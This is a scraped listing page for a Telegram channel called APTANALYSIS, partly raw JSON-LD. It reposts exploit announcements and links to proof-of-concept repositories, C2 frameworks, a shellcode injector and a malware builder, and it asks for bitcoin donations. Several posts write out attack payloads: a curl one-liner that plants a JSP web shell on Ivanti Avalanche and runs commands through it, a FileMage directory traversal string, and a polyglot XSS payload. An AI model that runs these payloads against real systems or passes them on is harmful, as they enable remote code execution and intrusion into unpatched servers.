996
订阅者
无数据24 小时
无数据7 天
无数据30 天
帖子存档
\\74k \n \n\nhttps://brutelogic.com.br/gym.php\n\n⛔#MOD_XSS\n📱@APTANALYSIS","datePublished":"2023-08-27T14:46:56Z","dateModified":"2023-08-27T14:46:56Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":343},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":19}]}},{"@type":"ListItem","position":4,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/315","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/315","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/315","headline":"🔥🔥🔥CVE-2023-38831 : WinRAR < 6.23 - Attribute Code Execution 🟢POC : https://github.com/b1tg/CVE-2023-38831-wi…","articleBody":"🔥🔥🔥CVE-2023-38831 : WinRAR < 6.23 - Attribute Code Execution\n🟢POC : https://github.com/b1tg/CVE-2023-38831-winrar-exploit\n🐈⬛NIST : https://nvd.nist.gov/vuln/detail/CVE-2023-38831\n✅TEST : Proof of concept has been tested on Windows 10 x64 & WinRAR v6.10\n📱@APTIRAN","datePublished":"2023-08-26T12:23:08Z","dateModified":"2023-08-26T12:23:08Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":197},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":10},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":14}],"sharedContent":{"@type":"SocialMediaPosting","datePublished":"2023-08-26T12:19:45Z"}}},{"@type":"ListItem","position":5,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/314","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/314","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/314","headline":"🎁CVE-2023-38831 : WinRAR < 6.23 - Attribute code execution 🟢POC : ⭐️1. https://github.com/b1tg/CVE-2023-38831…","articleBody":"🎁CVE-2023-38831 : WinRAR < 6.23 - Attribute code execution\n🟢POC : \n⭐️1. https://github.com/b1tg/CVE-2023-38831-winrar-exploit\n⭐️2. https://github.com/ZenNotMovie/cve-2023-winrar\n⭐️3. https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc\n⚠️Warning: Not tested\n⛔#Exploit \n📱@APTANALYSIS","datePublished":"2023-08-25T14:48:06Z","dateModified":"2023-08-25T14:48:06Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":376},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":11},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":11}]}},{"@type":"ListItem","position":6,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/313","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/313","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/313","headline":"😋Come Faster CVE-2023-41106 we are waiting","articleBody":"😋Come Faster CVE-2023-41106 we are waiting","datePublished":"2023-08-25T14:33:48Z","dateModified":"2023-08-25T14:33:48Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":323},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":5}]}},{"@type":"ListItem","position":7,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/311","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/311","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/311","headline":"🟥CVE-2023-32563 : Ivanti Avalanche - Unauthenticated Remote Code Execution curl -v http://192.168.56.101:1900…","articleBody":"🟥CVE-2023-32563 : Ivanti Avalanche - Unauthenticated Remote Code Execution\n\ncurl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F \"file=@-;filename=x.jsp\" <<<'<%Runtime.getRuntime().exec(request.getParameter(\"c\"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe\n\n\"POST /Servlet/Skins\" in C:\\Program Files\\Wavelink\\Avalanche\\RemoteControl\\logs\\jetty-*.request.log\n\n🐈⬛CVE-2023-38035 : MobileIron Sentry - information extraction\n➡️go : https://github.com/LeakIX/sentryexploit\n⛔#Exploit , #PoC \n📱@APTANALYSIS","datePublished":"2023-08-25T14:24:27Z","dateModified":"2023-08-25T14:24:27Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":312},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":8,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/309","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/309","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/309","headline":"⭐️A Beginner’s Guide to Adversary Emulation with Caldera 🗣️Post : https://blog.nviso.eu/2023/08/25/a-beginner…","articleBody":"⭐️A Beginner’s Guide to Adversary Emulation with Caldera\n🗣️Post : https://blog.nviso.eu/2023/08/25/a-beginners-guide-to-adversary-emulation-with-caldera/\n⭐️Unlocking the power of Red Teaming: An overview of trainings and certifications\n🗣️Post : https://blog.nviso.eu/2023/07/31/unlocking-the-power-of-red-teaming-an-overview-of-trainings-and-certifications/\n⛔#RedTeam . #Offensive , #Guid , #C2\n📱@APTANALYSIS","datePublished":"2023-08-25T14:03:22Z","dateModified":"2023-08-25T14:03:22Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":295},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":14}]}},{"@type":"ListItem","position":9,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/305","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/305","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/305","headline":"🤔CVE-2023-27159 : Appwrite <= 1.2.1 - Unauthenticated Server-Side Request Forgery (SSRF) 🟢POC / BLOG : https:…","articleBody":"🤔CVE-2023-27159 : Appwrite <= 1.2.1 - Unauthenticated Server-Side Request Forgery (SSRF)\n🟢POC / BLOG : https://notes.sjtu.edu.cn/gMNlpByZSDiwrl9uZyHTKA\n⛔#Exploit , #PoC\n📱@APTANALYSIS","datePublished":"2023-08-25T13:51:51Z","dateModified":"2023-08-25T13:51:51Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":293},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9}]}},{"@type":"ListItem","position":10,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/304","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/304","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/304","headline":"🔥CVE-2023-36844 : Juniper JunOS within SRX and EX Series products - Remote Code Execution (RCE IN Juniper Fir…","articleBody":"🔥CVE-2023-36844 : Juniper JunOS within SRX and EX Series products - Remote Code Execution (RCE IN Juniper Firewalls)\n💥CVEs : CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847\n🔴Blog : https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/\n🟢POC : https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844\n⛔#Exploit , #ANALYSIS\n📱@APTANALYSIS","datePublished":"2023-08-25T13:34:02Z","dateModified":"2023-08-25T13:34:02Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":300},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":11}]}},{"@type":"ListItem","position":11,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/302","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/302","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/302","headline":"😠Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance thei…","articleBody":"😠Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells, enhance their functionality with additional features (commands, utilities etc) and share them among connected sibling servers (Villain instances running on different machines). \n⭐️Repo : https://github.com/t3l3machus/Villain\n⛔#C2 , #RedTeam , #Offensive\n📱@APTANALYSIS","datePublished":"2023-08-25T03:20:53Z","dateModified":"2023-08-25T03:20:53Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":309},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":9}]}},{"@type":"ListItem","position":12,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/300","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/300","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/300","headline":"🔔CVE-2023-30943 : Moodle <= 4.2.0 - Arbitrary folder creation (Stored-XSS) to RCE ⭐️Link : https://www.sonars…","articleBody":"🔔CVE-2023-30943 : Moodle <= 4.2.0 - Arbitrary folder creation (Stored-XSS) to RCE \n⭐️Link : https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/\n⛔#Hunting\n📱@APTANALYSIS","datePublished":"2023-08-24T18:19:08Z","dateModified":"2023-08-24T18:19:08Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":281},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":6},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":8}]}},{"@type":"ListItem","position":13,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/299","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/299","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/299","headline":"⭐️CVE-2023-39026: FileMage Gateway <= 1.10.9 - Directory Traversal Payload : /mgmnt/..%5c..%5c..%5c..%5c..%5c…","articleBody":"⭐️CVE-2023-39026: FileMage Gateway <= 1.10.9 - Directory Traversal\nPayload : /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5 cwindows%5cwin.ini\n⛔#Exploit \n📱@APTANALYSIS","datePublished":"2023-08-24T17:24:54Z","dateModified":"2023-08-24T17:24:54Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":262},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":9},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":6}]}},{"@type":"ListItem","position":14,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/298","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/298","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/298","headline":"🟢Bypassing Bitlocker using a cheap logic analyzer 🗣️Link : https://www.errno.fr/BypassingBitlocker ⛔#Bypass 📱…","articleBody":"🟢Bypassing Bitlocker using a cheap logic analyzer \n🗣️Link : https://www.errno.fr/BypassingBitlocker\n⛔#Bypass \n📱@APTANALYSIS","datePublished":"2023-08-24T15:59:26Z","dateModified":"2023-08-24T15:59:26Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":260},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":11}]}},{"@type":"ListItem","position":15,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/297","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/297","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/297","headline":"🐈CVE-2023-38035 : Ivanti Sentry Authentication Bypass Deep Dive Blog : https://www.horizon3.ai/ivanti-sentry-…","articleBody":"🐈CVE-2023-38035 : Ivanti Sentry Authentication Bypass Deep Dive\nBlog : https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/\nPOC : https://github.com/horizon3ai/CVE-2023-38035\n⛔#Exploit , #ANALYSIS\n📱@APTANALYSIS","datePublished":"2023-08-24T12:31:34Z","dateModified":"2023-08-24T12:31:34Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":253},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":3}]}},{"@type":"ListItem","position":16,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/295","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/295","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/295","headline":"🔥CVE-2023-26256 & -/-/26255 : STAGIL Navigation - Menu & Themes plugin <= 2.0.52 for Jira - Unauthenticated P…","articleBody":"🔥CVE-2023-26256 & -/-/26255 : \nSTAGIL Navigation - Menu & Themes plugin <= 2.0.52 for Jira - Unauthenticated Path Traversal\n🟢POC : https://github.com/aodsec/CVE-2023-26256\n⛔#Exploit\n📱@APTANALYSIS","datePublished":"2023-08-24T07:52:56Z","dateModified":"2023-08-24T07:52:56Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":276},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}},{"@type":"ListItem","position":17,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/293","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/293","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/293","headline":"🖥Successive / repetition 🐈⬛CVE-2023-27532 : Veeam Backup and Replication 🔴POC : https://github.com/horizon3a…","articleBody":"🖥Successive / repetition\n🐈⬛CVE-2023-27532 : Veeam Backup and Replication\n🔴POC : https://github.com/horizon3ai/CVE-2023-27532\n🔴POC : https://github.com/sfewer-r7/CVE-2023-27532\n🐈⬛CVE-2023-32315 : Openfire\n🔴POC : https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass\n🐈⬛CVE-2021-21974 & CVE-2020-3992: VMware ESXi OpenSLP\n🔴1 : https://straightblast.medium.com/my-poc-walkthrough-for-cve-2021-21974-a266bcad14b9\n🔴2 : https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/\n🔴3 : https://www.zerodayinitiative.com/blog/2021/3/1/cve-2020-3992-amp-cve-2021-21974-pre-auth-remote-code-execution-in-vmware-esxi\n🔴POC : https://github.com/Shadow0ps/CVE-2021-21974\n🔴POC : https://github.com/straightblast/My-PoC-Exploits/blob/master/CVE-2021-21974.py\n⛔#Exploit , #Ransomware , #ANALYSIS\n📱@APTANALYSIS","datePublished":"2023-08-24T00:03:20Z","dateModified":"2023-08-24T00:03:20Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":243},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":10},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":7}]}},{"@type":"ListItem","position":18,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/292","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/292","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/292","headline":"🙂Photo Exploit Downloader FUD Crypter Malware Builder REPO : https://github.com/benedixX0/Jpg-Png-Exploit-Dow…","articleBody":"🙂Photo Exploit Downloader FUD Crypter Malware Builder\nREPO : https://github.com/benedixX0/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2023\n⚠️Be careful, it has not been tested.\n⛔#TOOLS , #EXP\n📱@APTANALYSIS","datePublished":"2023-08-23T23:26:57Z","dateModified":"2023-08-23T23:26:57Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":257},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":10},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":19}]}},{"@type":"ListItem","position":19,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/290","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/290","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/290","headline":"🔥CVE-2023-31492 : Zoho ManageEngine ADManager Plus Build 7180 - Recovery Password Disclosure - ZVE-2023-0176…","articleBody":"🔥CVE-2023-31492 : Zoho ManageEngine ADManager Plus Build 7180 - Recovery Password Disclosure - ZVE-2023-0176\n🟢POC : https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md\n⛔#Exploit\n📱@APTANALYSIS","datePublished":"2023-08-23T23:17:01Z","dateModified":"2023-08-23T23:17:01Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":2080},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":7},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":24}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/289","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/289","mainEntityOfPage":"https://telemetr.io/ch/channels/1831752170-aptanalysis/posts/289","headline":"🔔BugBounty Tips : 🗣️Stored XSS Filter Bypass in the Skills section ➡️Write-Up : https://xalgord.medium.com/st…","articleBody":"🔔BugBounty Tips : \n🗣️Stored XSS Filter Bypass in the Skills section\n➡️Write-Up : https://xalgord.medium.com/stored-xss-filter-bypass-in-the-skills-section-7bf5e33c8ace\n👩💻Nuclei Template Editor - AI-powered hub to create, debug, scan, and store templates. Collaborate effortlessly with your team and community.\n➡️Editor: https://templates.nuclei.sh\n➡️Docs: https://docs.nuclei.sh/editor\n😵The only graphQL wordlist you need, ML bug hunting and VDP submissions\n🗣️intigriti : https://blog.intigriti.com/2023/08/23/bug-bytes-209-the-only-graphql-wordlist-you-need-ml-bug-hunting-and-vdp-submissions/\n⛔#Bug_Bounty , #Hunting\n📱@APTANALYSIS","datePublished":"2023-08-23T22:45:49Z","dateModified":"2023-08-23T22:45:49Z","author":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"publisher":{"@type":"Organization","name":"Sani","url":"https://telemetr.io/ch/channels/1831752170-aptanalysis","image":"https://img.tlmtr.io/c/1ZXQpQ/5861659254505718318?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":245},{"@type":"InteractionCounter","interactionType":"https://schema.org/LikeAction","userInteractionCount":8},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":12}]}}]}










+1













+1




+1

996
💀NtRemoteLoad : Remote Shellcode Injector
⛓Repo : https://github.com/florylsk/NtRemoteLoad
⛔#shellcode
📱@APTANALYSIS
996
💰Bitcoin Wallet :
bc1q2lszqp7rv98ur8dsnz3p2my8qp4qhma0sfee38
💲Charging status : 🔺
❕Donate :
We need financial help to expand the activity and initial expenses. Thanks
996
💪gym
JavaScript://%250Aconfirm?.(1)/
/*'/*\'/*"/*\"/*
/*\/*%26apos;)/*</Title/</Style/</Script/</textArea/<iFrame/
</noScript>\74k<K/contentEditable/autoFocus/
OnFocus=/*${/*/;{/**/(confirm)(1)}//>
<Base/Href=//X55.is\76>
https://brutelogic.com.br/gym.php
⛔#MOD_XSS
📱@APTANALYSIS996
Repost from .....
🔥🔥🔥CVE-2023-38831 : WinRAR < 6.23 - Attribute Code Execution
🟢POC : https://github.com/b1tg/CVE-2023-38831-winrar-exploit
🐈⬛NIST : https://nvd.nist.gov/vuln/detail/CVE-2023-38831
✅TEST : Proof of concept has been tested on Windows 10 x64 & WinRAR v6.10
📱@APTIRAN
996
🎁CVE-2023-38831 : WinRAR < 6.23 - Attribute code execution
🟢POC :
⭐️1. https://github.com/b1tg/CVE-2023-38831-winrar-exploit
⭐️2. https://github.com/ZenNotMovie/cve-2023-winrar
⭐️3. https://github.com/BoredHackerBlog/winrar_CVE-2023-38831_lazy_poc
⚠️Warning: Not tested
⛔#Exploit
📱@APTANALYSIS
996
🟥CVE-2023-32563 : Ivanti Avalanche - Unauthenticated Remote Code Execution
curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe
"POST /Servlet/Skins" in C:\Program Files\Wavelink\Avalanche\RemoteControl\logs\jetty-*.request.log
🐈⬛CVE-2023-38035 : MobileIron Sentry - information extraction
➡️go : https://github.com/LeakIX/sentryexploit
⛔#Exploit , #PoC
📱@APTANALYSIS996
⭐️A Beginner’s Guide to Adversary Emulation with Caldera
🗣️Post : https://blog.nviso.eu/2023/08/25/a-beginners-guide-to-adversary-emulation-with-caldera/
⭐️Unlocking the power of Red Teaming: An overview of trainings and certifications
🗣️Post : https://blog.nviso.eu/2023/07/31/unlocking-the-power-of-red-teaming-an-overview-of-trainings-and-certifications/
⛔#RedTeam . #Offensive , #Guid , #C2
📱@APTANALYSIS
996
